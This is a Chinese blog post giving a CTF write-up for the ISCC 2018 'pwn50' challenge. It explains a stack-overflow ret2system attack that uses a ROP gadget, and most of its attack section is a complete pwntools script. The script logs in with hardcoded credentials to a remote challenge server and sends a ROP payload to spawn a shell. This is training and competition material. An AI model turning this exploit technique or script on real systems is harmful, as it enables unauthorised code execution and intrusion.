180503 Pwn-ISCC(1)

最新推荐文章于 2022-07-05 21:17:03 发布
最新推荐文章于 2022-07-05 21:17:03 发布
阅读量490 收藏
点赞数
分类专栏: CTF pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whklhhhh/article/details/80187507
版权
CTF 同时被 2 个专栏收录
163 篇文章 8 订阅
订阅专栏
pwn
5 篇文章 0 订阅
订阅专栏

pwn复健的第一题(:з」∠)还好比较简单
简单分析一下,在Menu中存在栈溢出,并且没有Canary保护
不过有NX保护,因此无法直接传入Shellcode

查了一下pwn的相关知识,发现这里导入了system函数,因此可以直接使用ret2system来getshell

system传参的寄存器是edi
这个常识级别的东西因为不记得,导致用栈传参试了半天不知道为啥错orz发现这个点也算大有收获啦

查找pop rdi;ret的shellcode,发现有一处满足需求

root@kali:~/ctf/iscc# ROPgadget –binary pwn50 –only ‘pop|ret’ | grep rdi
0x0000000000400b03 : pop rdi ; ret

/bin/sh当然就放在bss段了,这个地址也已知

Payload如下:

from pwn import *

#r = process("./pwn50")
r = remote('47.104.16.75',9000)
# 填充栈+ebp+(pop rdi;ret)+(&str)+(&system)
payload = 'a'*0x50 + 'a'*8 + p64(0x400b03) + p64(0x601100) + p64(0x400630)
log.info(r.recvuntil(":"))
r.sendline("admin")
log.info(r.recvuntil(":"))
r.sendline("T6OBSh2i")
log.info(r.recvuntil(":"))
r.sendline('1')
log.info(r.recvuntil(":"))
r.sendline('/bin/sh')
log.info(r.recvuntil(":"))
r.sendline(payload)
log.info(r.recvuntil(":"))
r.sendline('3')
r.interactive()

后来查看_system的调用发现在ExecCMD函数中有现成的payload
这里写图片描述

因此payload可以直接控制跳转到0x40084a即可,当然一般没有这么好的代码啦233

奈沙夜影
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 我什至开发了一些脚本和工具来帮助我获得更好的体验。 现在,到2020年,您将拥有一个更高效的pwn开发环境。 您可以在上面的GIF中瞥一眼最终环境。 在本文中,我将向您展示如何构建该环境。 Arch Linux 如果您想拥有一个ELF ,首先需要一个Linux发行版。 我使用 ,该具有强大的来安装各种软件,以下所有部分均基于此。 如果您使用其他Linux发行版甚至是macOS,则可能需要找到在计算机上安装某些软件包的方法。 但是以下配置仍然对您有用。 或者,如果您不想通过命令行安装Linux发行,则可以只切换到或 。 您可能会发现许多文章仍在教您如何使用yaou
pwn-200题目文件
02-16
pwn-200题目文件
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
2019_iscc_pwn350
Jc
05-26 485
引 1.这个道题有两个考察点 一个是ret2dl的了解(只要看过这个技术的,都知道哪里只需要拿过来使用就可以了)还有一个就是main函数末尾的堆栈平衡(自己在这里卡了好久) offset 相信解决的offset的大小,这道题有迎刃而解了(先补充一个知识点,对于新手) 1.第一个图是pwn350 第二个图是普通的main函数结尾处 2.IDA手动输入一下,会发现 ...
180509 Pwn-ISCCPwn2)
whklhhhh的博客
05-25 860
写作Pwn3读作Pwn2 23333 打开pwn3反编译,发现菜单,很明显是堆的题目了 看了一下在free的时候没有清空指针,造成野指针 以我浅薄的知识猜想是double free吧 参考ctf-wiki的fastbin-attack 主要漏洞在于通过fastbin管理堆的情况下,在free时仅会检查链表头部(即main_arena指向)的chunk 第一次释放free(chun...
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
ISCC2017 pwn 200 —— 字符串格式化漏洞
giantbranch的专栏
05-31 3591
简介  这是一道字符串格式化漏洞的题目,给了libc,直接字符串格式化漏洞泄露出地址,就可以算出system的地址,最后再写got表就行了伪代码int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // [sp+14h] [bp-6Ch]@3 int v4; // [sp+1
2022ISCC PWN
山高路远
07-05 1641
2022ISCC
ISCCpwn1格式化字符串漏洞详解!
BadRer的博客
05-29 3426
作为小白的我,自从入了ctf的坑就再也没爬起来过,从无到有实在是很辛苦。仅以此片纪念我的青春。   直接进入正题。这是个很明显的32位的格式化字符串漏洞。 上手就先leak出libc地址,求偏移得到system地址,(我也忘了有没有给lib库,反正我是在本地调试,拿自己的lib库。Ps:在本地可以通过./libc.so.6或者ldd --version 查看libc的版本号,作为新手还是
ISCC2017部分题目wp
xuqi7
05-26 1万+
比赛网址:http://iscc.isclab.org.cn 小菜做的一些题
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
pwn1
WYJ____的博客
05-10 1076
ls 列出文件和目录。 ls -l 列出文件的详细信息。 cat flag 显示文件flag的内容。
溢出练习题pwn1
Elvira
08-26 5119
集训慢慢接近了尾声,樊荣学长给我们jian
pwn刷题num5---ret2syscall
tbsqigongzi的博客
04-21 444
攻防世界pwn新手区cgpwn2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位,小端序 开启部分RELRO—got表仍可写 未开启canary保护—存在栈溢出 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 程序先让我们输入一个name,然后让我们输入一些信息,之后就结束了 直接ida 主函数就调用一个hello函数 发现危险函数gets()可以进行栈溢出,s距离返回地址0x2a(0x26+0x4)字节 之
iscc2021线下比赛 & 第一场线下AWD & 杂
njh18790816639的博客
06-21 1141
2021.6.1萌新赛-re_signin 这个是真的套题! 有点绕! 先使用uncompyle6进行pyc反编译,在线反编译和Easy-python这个是无法进行完全的反编译的!必须使用uncompyle6 uncompyle6 -o . flag.pyc # uncompyle6 version 3.7.4 # Python bytecode 3.8 (3413) # Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020,
ISCC web4
A_dmin的博客
05-08 1871
ISCC web4 打开网页看到: 代码审计。。。。。。。。。 一开始以为是sha256解密,结果半天搞不出来 后来才知道parse_url函数存在变量覆盖漏洞 因为要存在action参数,传入action=auth key也要传入key=0 由于key是要被sha256加密的 传入一个hashed_key,将原来的密文个覆盖掉 这个参数传入的是我们传入的key经过sha256加密后的密文,也...
CTF-PWN level5(Jarvis Oj)
SuperGate的博客
05-16 805
和level3_x64一样的文件,但是限制不能使用system和execv函数拿shell,但是可以用mmap和mprotect完成本题。 我尝试用mprotect来解决,首先mprotect的结构如下: int mprotect(const void *start, size_t len, int prot); 参数的含义是:把从start开始长度为len的内存区的保护属性修改为prot...
安卓pwn - De1taCTF(BroadcastTest)
热门推荐
whklhhhh的博客
05-05 2万+
BroadcastTest 背景 逆向APK可知程序中仅有MainActivity$Message和三个Receiver类。 前者实现了一个Parcelable类,后三个则是广播。 其中Receiver1是export的,接收并向Receiver2发送广播,Receiver2和3则非export,只能接收内部发送的广播。 功能为Receiver1接收base64传入的data,然后将其反序列化得到...
攻防世界pwn-forgot
最新发布
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值